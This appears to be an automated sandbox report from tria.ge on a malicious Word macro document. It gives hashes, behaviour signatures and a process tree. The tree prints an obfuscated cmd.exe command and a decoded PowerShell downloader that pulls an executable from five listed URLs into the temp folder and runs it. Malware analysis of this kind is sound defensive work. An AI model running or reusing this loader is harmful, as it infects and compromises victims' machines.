Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
28/09/2024, 17:39
General
-
Target
fcd0876b1f82c246ff0d07f7e6a4e37d_JaffaCakes118.doc
-
Size
84KB
-
MD5
fcd0876b1f82c246ff0d07f7e6a4e37d
-
SHA1
4b44a9eb9c4d69bc19e6f931c6aaf1504acba02f
-
SHA256
4c10ebf2339186ba1432a006b9062f41992017fb2578820fd08d29c5bdc9f8a6
-
SHA512
e43412b817bdd4662cfe592ea656d1fa1b9feb67f54c0964185dc7699f87cc435c049838ea5934f9fb33e789eea9469c965016b0e7cb69ebb9ea72f849564056
-
SSDEEP
768:ZCVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBx+1oadzX5k2i4gz+OFs2QDj:ZCocn1kp59gxBK85fBx+aa9i4bl
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 4 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Start PowerShell.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fcd0876b1f82c246ff0d07f7e6a4e37d_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe, ,;;;/V;,;,;/C",,,(,;,;,;,;,;,(,(,(,,,,,(s^e^t ^D4= ^ ^ ^ ^ ^}^}^{^hctac^}}^ka^erb;CrT^$^ ^ss^ec^orP-^tratS^;^)CrT^$^(^e^l^ifo^teva^s^.^Qw^I^$;^)^ydo^Be^sno^ps^er^.v^wq$^(etirw.Qw^I$^;1^ = ^e^pyt.Q^w^I$;^)^(ne^po^.^Q^w^I$^{ ^)^0^0^2^ qe^-^ ^su^t^a^tS^.vwq$^( ^f^I;^)^(^dn^e^s.vw^q$;^)0^,^F^GM^$^,'^TE^G'^(ne^po^.vw^q^$^{yr^t^{^)^Q^WN$ n^i FG^M$^(^hc^aer^o^f;^'^maer^t^s.^bdo^d^a' ^m^oc-^ tc^e^jb^O^-weN = QwI^$;^'pt^th^lmx^.^2lmx^sm'^ ^m^oc-^ ^tce^jb^O-^weN=^ vwq$^;^)'^ex^e.^h^XC\^'+^)^(^h^ta^P^pm^eT^t^e^G:^:]^hta^P.^OI^.me^tsy^S[^(=CrT$^;^)^'@'^(tilp^S^.^'4CD3^0A^XN/ten^.^wbb^go^lb//^:p^t^th^@Uy^Q^QV0S^O^j^b/ln^.^snoit^aerc^e^l^bi^s^ivn^i.^w^en//^:p^t^th^@A^JUO^ivx1h^Y/moc^.^dn^ali^a^h^tal^ov//^:pt^t^h^@kk^X^S^jz^8V/m^oc.m^ih^a^fla^a^s^s^i^e//^:^ptt^h^@^PI^T^Okv8/moc.n^owno^i^l^.^w^ww//^:^pt^th^'^=^Q^WN$;'C^j^z'=^jna$^ ^l^le^hsr^ewo^p);););;;;;;;;;;;);,;,;)&&;,,;;^f^or,/^L;,,,%^4,,^in;,(55^4;-^1^;^0^;;;^;);d^o,;;,(,;,;,(,;,;,;,(,(;^s^et ^iJ=!^iJ!!^D4:~%^4,1!);,;);;;;;);)&&;;^i^f;,%^4;; ,,,l^e^q,;;,,^0;;,,(,(,,,(,;,;,;,;,;,(c^a^ll;,%^iJ:^*i^J!^=%),),),,,,,)"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe , ,;;;/V;,;,;/C",,,(,;,;,;,;,;,(,(,(,,,,,(s^e^t ^D4= ^ ^ ^ ^ ^}^}^{^hctac^}}^ka^erb;CrT^$^ ^ss^ec^orP-^tratS^;^)CrT^$^(^e^l^ifo^teva^s^.^Qw^I^$;^)^ydo^Be^sno^ps^er^.v^wq$^(etirw.Qw^I$^;1^ = ^e^pyt.Q^w^I$;^)^(ne^po^.^Q^w^I$^{ ^)^0^0^2^ qe^-^ ^su^t^a^tS^.vwq$^( ^f^I;^)^(^dn^e^s.vw^q$;^)0^,^F^GM^$^,'^TE^G'^(ne^po^.vw^q^$^{yr^t^{^)^Q^WN$ n^i FG^M$^(^hc^aer^o^f;^'^maer^t^s.^bdo^d^a' ^m^oc-^ tc^e^jb^O^-weN = QwI^$;^'pt^th^lmx^.^2lmx^sm'^ ^m^oc-^ ^tce^jb^O-^weN=^ vwq$^;^)'^ex^e.^h^XC\^'+^)^(^h^ta^P^pm^eT^t^e^G:^:]^hta^P.^OI^.me^tsy^S[^(=CrT$^;^)^'@'^(tilp^S^.^'4CD3^0A^XN/ten^.^wbb^go^lb//^:p^t^th^@Uy^Q^QV0S^O^j^b/ln^.^snoit^aerc^e^l^bi^s^ivn^i.^w^en//^:p^t^th^@A^JUO^ivx1h^Y/moc^.^dn^ali^a^h^tal^ov//^:pt^t^h^@kk^X^S^jz^8V/m^oc.m^ih^a^fla^a^s^s^i^e//^:^ptt^h^@^PI^T^Okv8/moc.n^owno^i^l^.^w^ww//^:^pt^th^'^=^Q^WN$;'C^j^z'=^jna$^ ^l^le^hsr^ewo^p);););;;;;;;;;;;);,;,;)&&;,,;;^f^or,/^L;,,,%^4,,^in;,(55^4;-^1^;^0^;;;^;);d^o,;;,(,;,;,(,;,;,;,(,(;^s^et ^iJ=!^iJ!!^D4:~%^4,1!);,;);;;;;);)&&;;^i^f;,%^4;; ,,,l^e^q,;;,,^0;;,,(,(,,,(,;,;,;,;,;,(c^a^ll;,%^iJ:^*i^J!^=%),),),,,,,)"3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $anj='zjC';$NWQ='http://www.lionwon.com/8vkOTIP@http://eissaalfahim.com/V8zjSXkk@http://volathailand.com/Yh1xviOUJA@http://new.invisiblecreations.nl/bjOS0VQQyU@http://blogbbw.net/NXA03DC4'.Split('@');$TrC=([System.IO.Path]::GetTempPath()+'\CXh.exe');$qwv =New-Object -com 'msxml2.xmlhttp';$IwQ = New-Object -com 'adodb.stream';foreach($MGF in $NWQ){try{$qwv.open('GET',$MGF,0);$qwv.send();If ($qwv.Status -eq 200) {$IwQ.open();$IwQ.type = 1;$IwQ.write($qwv.responseBody);$IwQ.savetofile($TrC);Start-Process $TrC;break}}catch{}}4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
12B
MD5f6f801e5b0502f5e803ed826dd37ae44
SHA1273e87aa518397186653443c0c3e81d574361708
SHA256e7bcd23ba708556ee69f96050dc7e74f9dab95825bfab48bcea7fd8fac482fd1
SHA5128fe0217b9c7f9331664dc4259c7924b9c7e5e145f0b795ec98d713e41a2e3d001014b3ac41071fe41447632ddbfbbefc8c7d6de8fa9faeca455a0a78575e5584
-
Filesize
136KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB